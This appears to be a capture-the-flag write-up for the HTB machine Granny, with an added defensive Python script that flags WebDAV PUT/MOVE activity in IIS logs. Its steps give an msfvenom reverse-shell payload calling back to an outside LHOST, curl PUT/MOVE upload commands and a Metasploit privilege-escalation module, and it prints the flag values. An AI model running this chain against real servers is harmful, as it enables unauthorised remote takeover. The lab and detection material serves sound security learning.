GRANNY 10.10.10.15 Write Up
Machine Created by ch4p

Tools Used for Enumeration:
1. nmap
2. davtest

Tools Used for Exploitation:
1. metasploit

Steps for primary enumeration:
1. First we use nmap (the Network Mapper) to scan the box IP. The scan returns a list of open ports and the services running on them. On the Granny box the open port is 80, running Microsoft IIS httpd 6.0. Command used: nmap -A 10.10.10.15
2. Opening the site in a browser shows the default IIS "under construction" page (WebDAV is enabled).
Steps to get user.txt:
1. The nmap scan showed that the PUT method is allowed on the WebDAV server.
2. We can use the davtest tool to check which file types can be uploaded. Command used: davtest -url http://10.10.10.15
3. We can create a Metasploit reverse shell payload to upload with the command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=1337 -f aspx > zishan.aspx". Then we can upload the file with the command "curl -X PUT http://10.10.10.15/zishan.txt --data-binary @zishan.aspx". Then we move the text file to an executable extension with the command "curl -X MOVE -H 'Destination: http://10.10.10.15/zishan.aspx' http://10.10.10.15/zishan.txt" (the site is served over plain HTTP on port 80, so both URLs use http).
4. Now we can listen with the Metasploit module "exploit/multi/handler", setting the proper LHOST, LPORT and the payload "windows/meterpreter/reverse_tcp". Requesting the uploaded shell with the command "curl http://10.10.10.15/zishan.aspx" gives us a shell.
5. We can get local exploit suggestions using the module "post/multi/recon/local_exploit_suggester" after setting the proper local host and session.
6. Testing a working module from the suggestions gives us a SYSTEM-privileged shell on the machine. Module used: exploit/windows/local/ms14_058_track_popup_menu
7. Now we can read user.txt with the command "cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'".
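From the defender's side, the foothold in steps 1 to 4 leaves a recognisable trail in the IIS logs: a PUT of a harmless-looking file followed shortly by a MOVE of the same resource. The script below is an added example and not part of the original write-up. The log lines are constructed to mirror the write-up's addresses and file names (the timestamps and User-Agent strings are made up), and the column layout follows the IIS 6.0 W3C extended format. It parses the #Fields header so the column order is never hard-coded, lists every WebDAV write method seen, and flags a successful PUT followed by a MOVE of the same URI from the same client.

```python
"""Flag WebDAV write activity in IIS W3C extended log lines.

Added example (not part of the original write-up). Default IIS logging
records the method and URI of each request, so a defender can alert on
WebDAV write methods and on the PUT -> MOVE pair against the same
resource from the same client.
"""
from datetime import datetime, timedelta

# WebDAV methods that create or change content; any of these from an
# unexpected client is worth an alert on its own.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}

# Constructed sample log, modelled on the IIS 6.0 W3C extended format.
# Addresses and paths mirror the write-up; timestamps and agents are invented.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2017-04-12 10:00:01 10.10.10.15 GET / - 80 - 10.10.14.21 curl/7.52.1 200 0 0
2017-04-12 10:00:05 10.10.10.15 OPTIONS / - 80 - 10.10.14.21 curl/7.52.1 200 0 0
2017-04-12 10:00:09 10.10.10.15 PUT /zishan.txt - 80 - 10.10.14.21 curl/7.52.1 201 0 0
2017-04-12 10:00:14 10.10.10.15 MOVE /zishan.txt - 80 - 10.10.14.21 curl/7.52.1 201 0 0
2017-04-12 10:00:20 10.10.10.15 GET /zishan.aspx - 80 - 10.10.14.21 curl/7.52.1 200 0 0
2017-04-12 10:01:00 10.10.10.15 GET /index.htm - 80 - 192.168.1.50 Mozilla/5.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign the columns
        yield dict(zip(fields, values))


def find_webdav_writes(text):
    """Return every request using a WebDAV write method as (time, client, method, uri, status)."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-method"].upper() in WRITE_METHODS:
            when = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            hits.append((when, rec["c-ip"], rec["cs-method"].upper(), rec["cs-uri-stem"], rec["sc-status"]))
    return hits


def find_put_then_move(text, window=timedelta(minutes=5)):
    """Return (client, uri) pairs where a successful PUT was followed by a MOVE of the same URI.

    The MOVE Destination header is not among the default W3C fields, so this
    rule keys on the method pair; the new file name is confirmed on disk.
    """
    last_put = {}  # (client, uri) -> time of the most recent successful PUT
    pairs = []
    for when, client, method, uri, status in find_webdav_writes(text):
        key = (client, uri)
        if method == "PUT" and status.startswith("2"):
            last_put[key] = when
        elif method == "MOVE" and key in last_put and when - last_put[key] <= window:
            pairs.append(key)
    return pairs


if __name__ == "__main__":
    for hit in find_webdav_writes(SAMPLE_LOG):
        print("WebDAV write method:", *hit)
    for client, uri in find_put_then_move(SAMPLE_LOG):
        print(f"PUT followed by MOVE of {uri} from {client}")
```

On the sample log the script reports the PUT and the MOVE, and pairs them as a single rename sequence from 10.10.14.21. The fix on the server side is to disable WebDAV where it is not needed, or to restrict the write methods to authenticated, authorised clients; the detection above is the fallback for hosts where that has not been done.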
Steps to get root.txt:
1. We can get the root.txt flag by typing the command "cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'".

Flags:
1. user.txt flag: 700c5dc163014e22b3e408f8703f67d1
2. root.txt flag: aa4beed1c0584445ab463a6747bd06e9